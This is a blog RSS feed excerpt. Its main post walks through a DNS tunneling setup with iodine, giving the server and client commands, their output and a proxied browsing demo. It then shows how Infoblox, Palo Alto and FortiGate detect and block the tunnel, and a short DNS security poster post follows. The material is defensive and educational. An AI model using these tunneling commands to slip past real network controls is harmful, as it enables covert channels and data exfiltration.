					<description><![CDATA[<img width="300" height="169" src="https://weberblog.net/wp-content/uploads/2025/12/DNS-Tunneling-iodine-featured-image-300x169.jpg" class="webfeedsFeaturedVisual wp-post-image" alt="" style="display: block; margin: auto; margin-bottom: 5px;max-width: 100%;" link_thumbnail="" decoding="async" loading="lazy" srcset="https://weberblog.net/wp-content/uploads/2025/12/DNS-Tunneling-iodine-featured-image-300x169.jpg 300w, https://weberblog.net/wp-content/uploads/2025/12/DNS-Tunneling-iodine-featured-image-1024x576.jpg 1024w, https://weberblog.net/wp-content/uploads/2025/12/DNS-Tunneling-iodine-featured-image-768x432.jpg 768w, https://weberblog.net/wp-content/uploads/2025/12/DNS-Tunneling-iodine-featured-image-1536x864.jpg 1536w, https://weberblog.net/wp-content/uploads/2025/12/DNS-Tunneling-iodine-featured-image.jpg 1920w" sizes="auto, (max-width: 300px) 100vw, 300px" />This post guides through a basic DNS tunneling setup with the usage of the appropriate tool &#8220;iodine&#8220;. It shows how DNS tunneling works and lists the commands needed to run this type of attack. That is, you can tunnel IPv4 packets through this DNS channel via the (internal) recursive DNS resolver! Nice approach. ;) In &#8230; <a href="https://weberblog.net/dns-tunneling-iodine/" class="more-link">Continue reading <span class="screen-reader-text">DNS Tunneling: iodine</span> <span class="meta-nav">&#8594;</span></a>]]></description>
										<content:encoded><![CDATA[<img width="300" height="169" src="https://weberblog.net/wp-content/uploads/2025/12/DNS-Tunneling-iodine-featured-image-300x169.jpg" class="webfeedsFeaturedVisual wp-post-image" alt="" style="display: block; margin: auto; margin-bottom: 5px;max-width: 100%;" link_thumbnail="" decoding="async" loading="lazy" srcset="https://weberblog.net/wp-content/uploads/2025/12/DNS-Tunneling-iodine-featured-image-300x169.jpg 300w, https://weberblog.net/wp-content/uploads/2025/12/DNS-Tunneling-iodine-featured-image-1024x576.jpg 1024w, https://weberblog.net/wp-content/uploads/2025/12/DNS-Tunneling-iodine-featured-image-768x432.jpg 768w, https://weberblog.net/wp-content/uploads/2025/12/DNS-Tunneling-iodine-featured-image-1536x864.jpg 1536w, https://weberblog.net/wp-content/uploads/2025/12/DNS-Tunneling-iodine-featured-image.jpg 1920w" sizes="auto, (max-width: 300px) 100vw, 300px" /><p>This post guides through a basic <strong>DNS tunneling setup</strong> with the usage of the appropriate tool &#8220;<strong>iodine</strong>&#8220;. It shows how DNS tunneling works and lists the commands needed to run this type of attack. That is, <strong>you can tunnel IPv4 packets through this DNS channel via the (internal) recursive DNS resolver</strong>! Nice approach. ;)</p>
<p>In the end, I&#8217;m pointing out how to block these tunnelling attempts with the DNS appliances from Infoblox, and the firewalls from Palo Alto Networks and Fortinet.</p>
<p><span id="more-13976"></span></p>
<div class="su-note"  style="border-color:#69adc8;border-radius:3px;-moz-border-radius:3px;-webkit-border-radius:3px;"><div class="su-note-inner su-u-clearfix su-u-trim" style="background-color:#83c7e2;border-color:#ffffff;color:#333333;border-radius:3px;-moz-border-radius:3px;-webkit-border-radius:3px;">If you’re looking for a broad overview of DNS security, feel free to check out <a href="https://weberblog.net/dns-security-sharkfest25-eu/">my talk from the Wireshark conference “SharkFest” here</a>.</div></div>
<p>At first, let&#8217;s have a look at how DNS tunneling works in general:</p>
<p><a href="https://weberblog.net/wp-content/uploads/2026/01/DNS-Tunneling-Sketch.png"><img loading="lazy" decoding="async" class="aligncenter size-large wp-image-14212" src="https://weberblog.net/wp-content/uploads/2026/01/DNS-Tunneling-Sketch-1024x517.png" alt="" width="604" height="305" srcset="https://weberblog.net/wp-content/uploads/2026/01/DNS-Tunneling-Sketch-1024x517.png 1024w, https://weberblog.net/wp-content/uploads/2026/01/DNS-Tunneling-Sketch-300x152.png 300w, https://weberblog.net/wp-content/uploads/2026/01/DNS-Tunneling-Sketch-768x388.png 768w, https://weberblog.net/wp-content/uploads/2026/01/DNS-Tunneling-Sketch-1536x776.png 1536w, https://weberblog.net/wp-content/uploads/2026/01/DNS-Tunneling-Sketch-2048x1034.png 2048w" sizes="auto, (max-width: 604px) 100vw, 604px" /></a></p>
<div class="su-note"  style="border-color:#69adc8;border-radius:3px;-moz-border-radius:3px;-webkit-border-radius:3px;"><div class="su-note-inner su-u-clearfix su-u-trim" style="background-color:#83c7e2;border-color:#ffffff;color:#333333;border-radius:3px;-moz-border-radius:3px;-webkit-border-radius:3px;">The most important thing to understand about DNS tunneling is this: No direct connection is established from the client to the server, nor is UDP port 53 simply repurposed by sending the original packets through it. Instead, <strong>the data to be tunneled is cut into small pieces and sent as legitimate DNS queries or responses &#8211; travelling through the recursive resolver</strong> all the way to the attacker’s (authoritative) DNS server.</div></div>
<p>For more information about iodine, the DNS tunneling tool of choice, have a look at their <a href="https://code.kryo.se/iodine/" target="_blank" rel="noopener">project homepage</a>, or <a href="https://davidhamann.de/2019/05/12/tunnel-traffic-over-dns-ssh/" target="_blank" rel="noopener">this more detailed blog post</a> from David Hamann.</p>
<div style="margin-bottom:24px"><a href="https://weberblog.net/packetowl-suricata-ids-basiertes-hochleistungs-nsm" target="_blank" rel="noopener"><img decoding="async" class="aligncenter size-full" src="https://weberblog.net/wp-content/uploads/2026/05/Banner_PacketOwl.1208x232.webp" /></a></div>
<h2>iodine Setup</h2>
<p>For my tests, I used a delegated subdomain &#8220;io.weberlab.de&#8221;. That is: underneath my domain weberlab.de, I delegated (NS records) the subdomain &#8220;io&#8221; to the IP addresses of the server, which runs iodine:</p><pre class="urvanov-syntax-highlighter-plain-tag">io      IN      NS      lx3
lx3     IN      A       85.215.94.29
        IN      AAAA    2a01:238:4363:ee00:9169:a8a4:e572:d5f8</pre><p>
<h3>Server</h3>
<ul>
<li>-f to run in foreground</li>
<li>-c for checking disabled, to answer all incoming requests</li>
<li>-P passphrase</li>
<li>IP address of the internal tunnel interface &lt;- that&#8217;s the fun part</li>
<li>name of the delegated zone</li>
</ul>
</p><pre class="urvanov-syntax-highlighter-plain-tag">weberjoh@h2877111:~$ sudo iodined -f -c -P passphrase 192.168.99.1 io.weberlab.de
Opened dns0
Setting IP of dns0 to 192.168.99.1
Setting MTU of dns0 to 1130
Opened IPv4 UDP socket
Listening to dns for domain io.weberlab.de</pre><p>
This creates a tunnel interface called &#8220;dns0&#8221;:</p><pre class="urvanov-syntax-highlighter-plain-tag">weberjoh@h2877111:~$ ip a s
[...]
4: dns0: &lt;POINTOPOINT,MULTICAST,NOARP,UP,LOWER_UP&gt; mtu 1130 qdisc pfifo_fast state UNKNOWN group default qlen 500
    link/none
    inet 192.168.99.1/27 scope global dns0
       valid_lft forever preferred_lft forever</pre><p>
The &#8220;vendor&#8221; of iodine offers a checking tool at <a href="https://code.kryo.se/iodine/check-it/" target="_blank" rel="noopener">https://code.kryo.se/iodine/check-it/</a>:</p>
<p><img loading="lazy" decoding="async" class="aligncenter size-large wp-image-14186" src="https://weberblog.net/wp-content/uploads/2025/12/DNS-Tunneling-iodine-check-setup-1024x741.png" alt="" width="604" height="437" srcset="https://weberblog.net/wp-content/uploads/2025/12/DNS-Tunneling-iodine-check-setup-1024x741.png 1024w, https://weberblog.net/wp-content/uploads/2025/12/DNS-Tunneling-iodine-check-setup-300x217.png 300w, https://weberblog.net/wp-content/uploads/2025/12/DNS-Tunneling-iodine-check-setup-768x556.png 768w, https://weberblog.net/wp-content/uploads/2025/12/DNS-Tunneling-iodine-check-setup.png 1475w" sizes="auto, (max-width: 604px) 100vw, 604px" /></p>
<h3>Client</h3>
<ul>
<li>-f for foreground</li>
<li>-P passphrase</li>
<li>-r to NOT use the raw mode which would end in a direct connection to the server rather than the usage of the recursive DNS resolver</li>
<li>IP address of the recursive DNS server</li>
<li>name of the delegated zone used for this tunneling (I simply used an open DNS resolver <a href="https://publicdnsserver.com/germany/" target="_blank" rel="noopener">found here</a>)</li>
</ul>
<pre class="urvanov-syntax-highlighter-plain-tag">weberjoh@vm32-test2:~$ sudo iodine -f -P passphrase -r 85.214.123.36 io2.weberlab.de
Opened dns0
Opened IPv4 UDP socket
Sending DNS queries for io2.weberlab.de to 85.214.123.36
Autodetecting DNS query type (use -T to override).
Using DNS type NULL queries
Version ok, both using protocol v 0x00000502. You are user #0
Setting IP of dns0 to 192.168.99.2
Setting MTU of dns0 to 1130
Server tunnel IP is 192.168.99.1
Skipping raw mode
Using EDNS0 extension
Switching upstream to codec Base64
Server switched upstream to codec Base64
No alternative downstream codec available, using default (Raw)
Switching to lazy mode for low-latency
Server switched to lazy mode
Autoprobing max downstream fragment size... (skip with -m fragsize)
768 ok.. 1152 ok.. ...1344 not ok.. ...1248 not ok.. ...1200 not ok.. 1176 ok.. 1188 ok.. will use 1188-2=1186
Setting downstream fragment size to max 1186...
Connection setup complete, transmitting data.</pre>
Pinging through this DNS tunnel:<br />
<pre class="urvanov-syntax-highlighter-plain-tag">weberjoh@vm32-test2:~$ ping 192.168.99.1
PING 192.168.99.1 (192.168.99.1) 56(84) bytes of data.
64 bytes from 192.168.99.1: icmp_seq=1 ttl=64 time=25.9 ms
64 bytes from 192.168.99.1: icmp_seq=2 ttl=64 time=20.0 ms
64 bytes from 192.168.99.1: icmp_seq=3 ttl=64 time=22.8 ms
64 bytes from 192.168.99.1: icmp_seq=4 ttl=64 time=19.5 ms
^C
--- 192.168.99.1 ping statistics ---
4 packets transmitted, 4 received, 0% packet loss, time 3005ms
rtt min/avg/max/mdev = 19.513/22.054/25.927/2.552 ms
weberjoh@vm32-test2:~$ lynx ip.webernetz.net</pre>
<div style="margin-bottom:24px"><a href="https://weberblog.net/packethawk-inline-bypass-network-tap" target="_blank" rel="noopener"><img decoding="async" class="aligncenter size-full" src="https://weberblog.net/wp-content/uploads/2026/05/Banner_PacketHawk.1208x232.webp" /></a></div>
<p>To not only ping through this DNS tunnel, but to browse, I installed the proxy &#8220;<a href="https://www.squid-cache.org/" target="_blank" rel="noopener">squid</a>&#8221; on the iodine server to surf through it. Now, I was able to use this proxy (behind the internal dns0 tunnel interface on the iodine server) to browse the Internet:</p><pre class="urvanov-syntax-highlighter-plain-tag">weberjoh@vm32-test2:~$ export http_proxy=http://192.168.99.1:3128
weberjoh@vm32-test2:~$ lynx ip.webernetz.net</pre><p>
This screenshot shows the CLI-based web browser &#8220;lynx&#8221;, which I used to open <a href="https://ip.webernetz.net" target="_blank" rel="noopener">https://ip.webernetz.net</a> to show my public IP. The insight: I&#8217;m online with the IPv6 address of the iodines server rather than the (private) IPv4 address of the client itself:</p>
<p><a href="https://weberblog.net/wp-content/uploads/2025/12/DNS-Tunneling-iodine-lynx-through-squid.png"><img loading="lazy" decoding="async" class="aligncenter size-large wp-image-14187" src="https://weberblog.net/wp-content/uploads/2025/12/DNS-Tunneling-iodine-lynx-through-squid-1024x659.png" alt="" width="604" height="389" srcset="https://weberblog.net/wp-content/uploads/2025/12/DNS-Tunneling-iodine-lynx-through-squid-1024x659.png 1024w, https://weberblog.net/wp-content/uploads/2025/12/DNS-Tunneling-iodine-lynx-through-squid-300x193.png 300w, https://weberblog.net/wp-content/uploads/2025/12/DNS-Tunneling-iodine-lynx-through-squid-768x494.png 768w, https://weberblog.net/wp-content/uploads/2025/12/DNS-Tunneling-iodine-lynx-through-squid-1536x989.png 1536w, https://weberblog.net/wp-content/uploads/2025/12/DNS-Tunneling-iodine-lynx-through-squid.png 1919w" sizes="auto, (max-width: 604px) 100vw, 604px" /></a></p>
<p>Q.E.D. 😂</p>
<p>This Wireshark screenshot shows a capture taken on the server component of iodine during the establishment phase. (It is also part of the <a href="https://weberblog.net/the-ultimate-pcap/">Ultimate PCAP</a>. Plz download and analyse it by yourself. Display filter: 
			<span id="urvanov-syntax-highlighter-6a78d868a3ea4024480127" class="urvanov-syntax-highlighter-syntax urvanov-syntax-highlighter-syntax-inline  crayon-theme-classic crayon-theme-classic-inline urvanov-syntax-highlighter-font-monaco" style="font-size: 12px !important; line-height: 15px !important;font-size: 12px !important;"><span class="crayon-pre urvanov-syntax-highlighter-code" style="font-size: 12px !important; line-height: 15px !important;font-size: 12px !important; -moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4;">dns.qry.name contains "io2.weberlab.de"</span></span>.) You can see normal DNS queries and responses between the DNS resolver and the iodine server itself, while the queried names are mostly random:</p>
<p><a href="https://weberblog.net/wp-content/uploads/2025/12/DNS-Tunneling-iodine-Wireshark-scaled.png"><img loading="lazy" decoding="async" class="aligncenter size-large wp-image-14188" src="https://weberblog.net/wp-content/uploads/2025/12/DNS-Tunneling-iodine-Wireshark-1024x611.png" alt="" width="604" height="360" srcset="https://weberblog.net/wp-content/uploads/2025/12/DNS-Tunneling-iodine-Wireshark-1024x611.png 1024w, https://weberblog.net/wp-content/uploads/2025/12/DNS-Tunneling-iodine-Wireshark-300x179.png 300w, https://weberblog.net/wp-content/uploads/2025/12/DNS-Tunneling-iodine-Wireshark-768x458.png 768w, https://weberblog.net/wp-content/uploads/2025/12/DNS-Tunneling-iodine-Wireshark-1536x916.png 1536w, https://weberblog.net/wp-content/uploads/2025/12/DNS-Tunneling-iodine-Wireshark-2048x1221.png 2048w" sizes="auto, (max-width: 604px) 100vw, 604px" /></a></p>
<h2>Blocking DNS Tunneling Attempts</h2>
<p>Always look on the blocking side of life. 🎶</p>
<h3>Infoblox NIOS Recursive DNS</h3>
<p>Using Infoblox NIOS as your recursive DNS server, tunneling events such as these are blocked after just a few packets. In my tests, the tunnel was detected and blocked just after four pings (right-hand side of the screenshot):</p>
<p><a href="https://weberblog.net/wp-content/uploads/2026/01/Infoblox-DNS-Tunneling-Block-01-PuTTY-Sessions-iodine-ping-NXDOMAIN-scaled.png"><img loading="lazy" decoding="async" class="aligncenter size-large wp-image-14213" src="https://weberblog.net/wp-content/uploads/2026/01/Infoblox-DNS-Tunneling-Block-01-PuTTY-Sessions-iodine-ping-NXDOMAIN-1024x608.png" alt="" width="604" height="359" srcset="https://weberblog.net/wp-content/uploads/2026/01/Infoblox-DNS-Tunneling-Block-01-PuTTY-Sessions-iodine-ping-NXDOMAIN-1024x608.png 1024w, https://weberblog.net/wp-content/uploads/2026/01/Infoblox-DNS-Tunneling-Block-01-PuTTY-Sessions-iodine-ping-NXDOMAIN-300x178.png 300w, https://weberblog.net/wp-content/uploads/2026/01/Infoblox-DNS-Tunneling-Block-01-PuTTY-Sessions-iodine-ping-NXDOMAIN-768x456.png 768w, https://weberblog.net/wp-content/uploads/2026/01/Infoblox-DNS-Tunneling-Block-01-PuTTY-Sessions-iodine-ping-NXDOMAIN-1536x912.png 1536w, https://weberblog.net/wp-content/uploads/2026/01/Infoblox-DNS-Tunneling-Block-01-PuTTY-Sessions-iodine-ping-NXDOMAIN-2048x1217.png 2048w" sizes="auto, (max-width: 604px) 100vw, 604px" /></a></p>
<p>&#8220;DNS Tunneling detected: &#8230;&#8221; events are generated, and the relevant (sub-)domain is <strong>placed in the configured blocklist RPZ</strong>:</p>

<a href='https://weberblog.net/wp-content/uploads/2026/01/Infoblox-DNS-Tunneling-Block-02-Infoblox-Log-scaled.png'><img loading="lazy" decoding="async" width="300" height="215" src="https://weberblog.net/wp-content/uploads/2026/01/Infoblox-DNS-Tunneling-Block-02-Infoblox-Log-300x215.png" class="attachment-medium size-medium" alt="" srcset="https://weberblog.net/wp-content/uploads/2026/01/Infoblox-DNS-Tunneling-Block-02-Infoblox-Log-300x215.png 300w, https://weberblog.net/wp-content/uploads/2026/01/Infoblox-DNS-Tunneling-Block-02-Infoblox-Log-1024x735.png 1024w, https://weberblog.net/wp-content/uploads/2026/01/Infoblox-DNS-Tunneling-Block-02-Infoblox-Log-768x551.png 768w, https://weberblog.net/wp-content/uploads/2026/01/Infoblox-DNS-Tunneling-Block-02-Infoblox-Log-1536x1102.png 1536w, https://weberblog.net/wp-content/uploads/2026/01/Infoblox-DNS-Tunneling-Block-02-Infoblox-Log-2048x1470.png 2048w" sizes="auto, (max-width: 300px) 100vw, 300px" /></a>
<a href='https://weberblog.net/wp-content/uploads/2026/01/Infoblox-DNS-Tunneling-Block-03-ta-blocklist.rpz_-scaled.png'><img loading="lazy" decoding="async" width="300" height="99" src="https://weberblog.net/wp-content/uploads/2026/01/Infoblox-DNS-Tunneling-Block-03-ta-blocklist.rpz_-300x99.png" class="attachment-medium size-medium" alt="" srcset="https://weberblog.net/wp-content/uploads/2026/01/Infoblox-DNS-Tunneling-Block-03-ta-blocklist.rpz_-300x99.png 300w, https://weberblog.net/wp-content/uploads/2026/01/Infoblox-DNS-Tunneling-Block-03-ta-blocklist.rpz_-1024x338.png 1024w, https://weberblog.net/wp-content/uploads/2026/01/Infoblox-DNS-Tunneling-Block-03-ta-blocklist.rpz_-768x254.png 768w, https://weberblog.net/wp-content/uploads/2026/01/Infoblox-DNS-Tunneling-Block-03-ta-blocklist.rpz_-1536x508.png 1536w, https://weberblog.net/wp-content/uploads/2026/01/Infoblox-DNS-Tunneling-Block-03-ta-blocklist.rpz_-2048x677.png 2048w" sizes="auto, (max-width: 300px) 100vw, 300px" /></a>

<h3>Palo Alto Networks NGFW</h3>
<p>Using a next-gen firewall from Palo Alto Networks between the client and the Internet, the DNS tunneling attempts with &#8220;iodine&#8221; are blocked in various ways. In fact, it wasn’t easy at all to set up a DNS tunnel through the Palo Alto firewall. 😂 I had to disable several rules and profiles just to get it working for testing purposes. It was more due to the tool’s signature than to a generic detection of DNS tunneling.</p>
<ol>
<li>I had an allow rule with the application &#8220;dns&#8221;, but iodine was detected as &#8220;tcp-over-dns&#8221;, hence: blocked.</li>
<li>Then I configured a port-based (service) allow rule for TCP/UDP port 53, but still with a security group with the <strong>anti-spyware strict</strong> profile: now connections were detected as &#8220;tcp-over-dns&#8221; (allowed), but recognised as a threat &#8220;<strong>Iodine DNS Tunnel Tool Command and Control Traffic Detection</strong>&#8221; -&gt; blocked again. :) Nice.</li>
<li>Finally, the port-based (service) allow rule without any security profile made it.</li>
</ol>
<p>In both blocking scenarios, the DNS tunnel was already blocked during the setup period!</p><pre class="urvanov-syntax-highlighter-plain-tag">weberjoh@nb15-lx:~$ sudo iodine -f -P passphrase -r 85.214.123.36 io.weberlab.de
Opened dns0
Opened IPv4 UDP socket
Sending DNS queries for io.weberlab.de to 85.214.123.36
Autodetecting DNS query type (use -T to override).
Using DNS type NULL queries
Retrying version check...
Retrying version check...
Retrying version check...
Retrying version check...
Retrying version check...
iodine: couldn't connect to server (maybe other -T options will work)</pre><p>
<a href="https://weberblog.net/wp-content/uploads/2026/01/Palo-Alto-DNS-Tunneling-Block-Unified-Logs-scaled.png"><img loading="lazy" decoding="async" class="aligncenter size-large wp-image-14216" src="https://weberblog.net/wp-content/uploads/2026/01/Palo-Alto-DNS-Tunneling-Block-Unified-Logs-1024x272.png" alt="" width="604" height="160" srcset="https://weberblog.net/wp-content/uploads/2026/01/Palo-Alto-DNS-Tunneling-Block-Unified-Logs-1024x272.png 1024w, https://weberblog.net/wp-content/uploads/2026/01/Palo-Alto-DNS-Tunneling-Block-Unified-Logs-300x80.png 300w, https://weberblog.net/wp-content/uploads/2026/01/Palo-Alto-DNS-Tunneling-Block-Unified-Logs-768x204.png 768w, https://weberblog.net/wp-content/uploads/2026/01/Palo-Alto-DNS-Tunneling-Block-Unified-Logs-1536x407.png 1536w, https://weberblog.net/wp-content/uploads/2026/01/Palo-Alto-DNS-Tunneling-Block-Unified-Logs-2048x543.png 2048w" sizes="auto, (max-width: 604px) 100vw, 604px" /></a></p>
<div style="margin-bottom:24px"><a href="https://weberblog.net/packetlion-aggregation-packet-broker" target="_blank" rel="noopener"><img decoding="async" class="aligncenter size-full" src="https://weberblog.net/wp-content/uploads/2026/05/Banner_PacketLion.1208x232.webp" /></a></div>
<h3>Fortinet Firewall</h3>
<p>On a FortiGate firewall, a rule allowing DNS without a security profile allowed the attack (unlike Palo Alto, which is application-based by default and blocks a &#8220;non-DNS&#8221; attempt directly).</p>
<p>A rule that still allows DNS, but with the <strong>Application Control to block &#8220;Proxy&#8221;</strong>, blocks iodine as well. In this blocking scenario, the DNS tunnel was already blocked during the setup period! Very good. The application was detected as &#8220;Iodine&#8221;.</p><pre class="urvanov-syntax-highlighter-plain-tag">weberjoh@vm32-test2:~$ sudo iodine -f -P passphrase -r 85.214.123.36 io2.weberlab.de
Opened dns0
Opened IPv4 UDP socket
Sending DNS queries for io2.weberlab.de to 85.214.123.36
Autodetecting DNS query type (use -T to override).....................
iodine: No suitable DNS query type found. Are you connected to a network?
iodine: If you expect very long roundtrip delays, use -T explicitly.
iodine: (Also, connecting to an "ancient" version of iodined won't work.)</pre><p>
<a href="https://weberblog.net/wp-content/uploads/2026/01/FortiGate-DNS-Tunneling-Block-Forward-Traffic-Logs-scaled.png"><img loading="lazy" decoding="async" class="aligncenter size-large wp-image-14217" src="https://weberblog.net/wp-content/uploads/2026/01/FortiGate-DNS-Tunneling-Block-Forward-Traffic-Logs-1024x487.png" alt="" width="604" height="287" srcset="https://weberblog.net/wp-content/uploads/2026/01/FortiGate-DNS-Tunneling-Block-Forward-Traffic-Logs-1024x487.png 1024w, https://weberblog.net/wp-content/uploads/2026/01/FortiGate-DNS-Tunneling-Block-Forward-Traffic-Logs-300x143.png 300w, https://weberblog.net/wp-content/uploads/2026/01/FortiGate-DNS-Tunneling-Block-Forward-Traffic-Logs-768x366.png 768w, https://weberblog.net/wp-content/uploads/2026/01/FortiGate-DNS-Tunneling-Block-Forward-Traffic-Logs-1536x731.png 1536w, https://weberblog.net/wp-content/uploads/2026/01/FortiGate-DNS-Tunneling-Block-Forward-Traffic-Logs-2048x975.png 2048w" sizes="auto, (max-width: 604px) 100vw, 604px" /></a></p>
<p>Soli Deo Gloria!</p>
<p><span class="text-Kvkr6N truncate-Pc_c1s textS-BC51wP">Photo by <a href="https://unsplash.com/@enginakyurt?utm_source=unsplash&amp;utm_medium=referral&amp;utm_content=creditCopyText">engin akyurt</a> on <a href="https://unsplash.com/photos/green-grass-field-near-gray-concrete-road-1gSwenOWEo8?utm_source=unsplash&amp;utm_medium=referral&amp;utm_content=creditCopyText">Unsplash</a></span>.</p>
]]></content:encoded>
					
					<wfw:commentRss>https://weberblog.net/dns-tunneling-iodine/feed/</wfw:commentRss>
			<slash:comments>3</slash:comments>
		
		
		<post-id xmlns="com-wordpress:feed-additions:1">13976</post-id>	</item>
		<item>
		<title>DNS Security Overview</title>
		<link>https://weberblog.net/dns-security-overview/?utm_source=rss&#038;utm_medium=rss&#038;utm_campaign=dns-security-overview</link>
					<comments>https://weberblog.net/dns-security-overview/#respond</comments>
		
		<dc:creator><![CDATA[Johannes Weber]]></dc:creator>
		<pubDate>Wed, 10 Dec 2025 08:10:55 +0000</pubDate>
				<category><![CDATA[At a Glance]]></category>
		<category><![CDATA[DNS/DNSSEC]]></category>
		<category><![CDATA[Security]]></category>
		<category><![CDATA[Attack]]></category>
		<category><![CDATA[DDoS]]></category>
		<category><![CDATA[DNS]]></category>
		<category><![CDATA[DNS Exfiltration]]></category>
		<category><![CDATA[DNS Spoofing]]></category>
		<category><![CDATA[DNS Tunneling]]></category>
		<category><![CDATA[DNSSEC]]></category>
		<category><![CDATA[DoH]]></category>
		<category><![CDATA[Malware]]></category>
		<category><![CDATA[MITM]]></category>
		<guid isPermaLink="false">https://weberblog.net/?p=14120</guid>

					<description><![CDATA[<img width="300" height="169" src="https://weberblog.net/wp-content/uploads/2025/12/DNS-Security-Overview-featured-image-300x169.jpg" class="webfeedsFeaturedVisual wp-post-image" alt="" style="display: block; margin: auto; margin-bottom: 5px;max-width: 100%;" link_thumbnail="" decoding="async" loading="lazy" srcset="https://weberblog.net/wp-content/uploads/2025/12/DNS-Security-Overview-featured-image-300x169.jpg 300w, https://weberblog.net/wp-content/uploads/2025/12/DNS-Security-Overview-featured-image-1024x576.jpg 1024w, https://weberblog.net/wp-content/uploads/2025/12/DNS-Security-Overview-featured-image-768x432.jpg 768w, https://weberblog.net/wp-content/uploads/2025/12/DNS-Security-Overview-featured-image-1536x864.jpg 1536w, https://weberblog.net/wp-content/uploads/2025/12/DNS-Security-Overview-featured-image.jpg 1920w" sizes="auto, (max-width: 300px) 100vw, 300px" />On the Internet, it’s not only “always DNS” &#8211; it’s also about securing DNS. DNS faces a wide range of attack vectors, each requiring different defensive strategies. Here comes an overview of DNS security, which gives you all the keywords at a glance. This is my approach to a picture worth a thousand words. I &#8230; <a href="https://weberblog.net/dns-security-overview/" class="more-link">Continue reading <span class="screen-reader-text">DNS Security Overview</span> <span class="meta-nav">&#8594;</span></a>]]></description>
										<content:encoded><![CDATA[<img width="300" height="169" src="https://weberblog.net/wp-content/uploads/2025/12/DNS-Security-Overview-featured-image-300x169.jpg" class="webfeedsFeaturedVisual wp-post-image" alt="" style="display: block; margin: auto; margin-bottom: 5px;max-width: 100%;" link_thumbnail="" decoding="async" loading="lazy" srcset="https://weberblog.net/wp-content/uploads/2025/12/DNS-Security-Overview-featured-image-300x169.jpg 300w, https://weberblog.net/wp-content/uploads/2025/12/DNS-Security-Overview-featured-image-1024x576.jpg 1024w, https://weberblog.net/wp-content/uploads/2025/12/DNS-Security-Overview-featured-image-768x432.jpg 768w, https://weberblog.net/wp-content/uploads/2025/12/DNS-Security-Overview-featured-image-1536x864.jpg 1536w, https://weberblog.net/wp-content/uploads/2025/12/DNS-Security-Overview-featured-image.jpg 1920w" sizes="auto, (max-width: 300px) 100vw, 300px" /><p>On the Internet, it’s not only “<a href="https://weberblog.net/its-always-dns-poster/">always DNS</a>” &#8211; <strong>it’s also about securing DNS</strong>. DNS faces a wide range of attack vectors, each requiring different defensive strategies. Here comes an <strong>overview of DNS security</strong>, which gives you all the keywords at a glance.</p>
<p><span id="more-14120"></span></p>
<div class="su-note"  style="border-color:#69adc8;border-radius:3px;-moz-border-radius:3px;-webkit-border-radius:3px;"><div class="su-note-inner su-u-clearfix su-u-trim" style="background-color:#83c7e2;border-color:#ffffff;color:#333333;border-radius:3px;-moz-border-radius:3px;-webkit-border-radius:3px;">This blog post is part of a series about DNS. Refer to <a href="https://weberblog.net/dns/">this list</a> for all articles.</div></div>
<div style="margin-bottom:24px"><a href="https://weberblog.net/packetfalcon-packet-capture" target="_blank" rel="noopener"><img decoding="async" class="aligncenter size-full" src="https://weberblog.net/wp-content/uploads/2026/05/Banner_PacketFalcon.1208x232.webp" /></a></div>
<p>This is my approach to a picture worth a thousand words. I use it during training sessions and at customers’ sites to explain concepts related to DNS security. Of course, this drawing isn’t perfect and doesn’t show every detail, but it’s a good starting point. ;) If you have any thoughts or corrections, please leave a comment below. (Thanks to <a href="https://mastodon.social/@cstrotm" target="_blank" rel="noopener">Carsten Strotmann</a> for reviewing it.)</p>
<p><a href="https://weberblog.net/wp-content/uploads/2025/12/DNS-Security-Overview-v20251209.png"><img loading="lazy" decoding="async" class="aligncenter size-large wp-image-14147" src="https://weberblog.net/wp-content/uploads/2025/12/DNS-Security-Overview-v20251209-1024x801.png" alt="" width="604" height="472" srcset="https://weberblog.net/wp-content/uploads/2025/12/DNS-Security-Overview-v20251209-1024x801.png 1024w, https://weberblog.net/wp-content/uploads/2025/12/DNS-Security-Overview-v20251209-300x235.png 300w, https://weberblog.net/wp-content/uploads/2025/12/DNS-Security-Overview-v20251209-768x600.png 768w, https://weberblog.net/wp-content/uploads/2025/12/DNS-Security-Overview-v20251209-1536x1201.png 1536w, https://weberblog.net/wp-content/uploads/2025/12/DNS-Security-Overview-v20251209-2048x1601.png 2048w" sizes="auto, (max-width: 604px) 100vw, 604px" /></a></p>
<p>Feel free to use it wherever you want. Please link back to this blog post.</p>
<p>If you want not only the poster but also a full session that explains all of this, take a look at <a href="https://weberblog.net/dns-security-sharkfest25-eu/">my <strong>DNS security presentation (full video!)</strong> from SharkFest’25 EU</a>.</p>
<p>Also, have a look at my at-a-glance version for mere DNS: <a href="https://weberblog.net/its-always-dns-poster/"><strong>It&#8217;s Always DNS &#8211; Poster</strong></a> and its <a href="https://weberblog.net/its-always-dns-sharkfest23-eu/">corresponding presentation</a>.</p>
<p>Soli Deo Gloria!</p>
<p><span class="text-Kvkr6N truncate-Pc_c1s textS-BC51wP">Photo by <a href="https://unsplash.com/@real_markjames?utm_source=unsplash&amp;utm_medium=referral&amp;utm_content=creditCopyText">Mark James Panaligan</a> on <a href="https://unsplash.com/photos/a-person-looking-out-a-window-Vr07g4reGBA?utm_source=unsplash&amp;utm_medium=referral&amp;utm_content=creditCopyText">Unsplash</a></span>.</p>
]]></content:encoded>
					
					<wfw:commentRss>https://weberblog.net/dns-security-overview/feed/</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
		<post-id xmlns="com-wordpress:feed-additions:1">14120</post-id>	</item>
		<item>
		<title>DNS Security @ SharkFest&#8217;25 EU</title>
		<link>https://weberblog.net/dns-security-sharkfest25-eu/?utm_source=rss&#038;utm_medium=rss&#038;utm_campaign=dns-security-sharkfest25-eu</link>
					<comments>https://weberblog.net/dns-security-sharkfest25-eu/#respond</comments>
		
		<dc:creator><![CDATA[Johannes Weber]]></dc:creator>
		<pubDate>Tue, 09 Dec 2025 14:53:28 +0000</pubDate>
				<category><![CDATA[Authentication]]></category>
		<category><![CDATA[Conference Talks]]></category>
		<category><![CDATA[DNS/DNSSEC]]></category>
		<category><![CDATA[Privacy]]></category>
		<category><![CDATA[Attack]]></category>
		<category><![CDATA[DNS]]></category>
		<category><![CDATA[DNS Exfiltration]]></category>
		<category><![CDATA[DNS Spoofing]]></category>
		<category><![CDATA[DNS Tunneling]]></category>
		<category><![CDATA[DNSSEC]]></category>
		<category><![CDATA[DoH]]></category>
		<category><![CDATA[DoT]]></category>
		<category><![CDATA[MITM]]></category>
		<category><![CDATA[SharkFest]]></category>
		<guid isPermaLink="false">https://weberblog.net/?p=14133</guid>

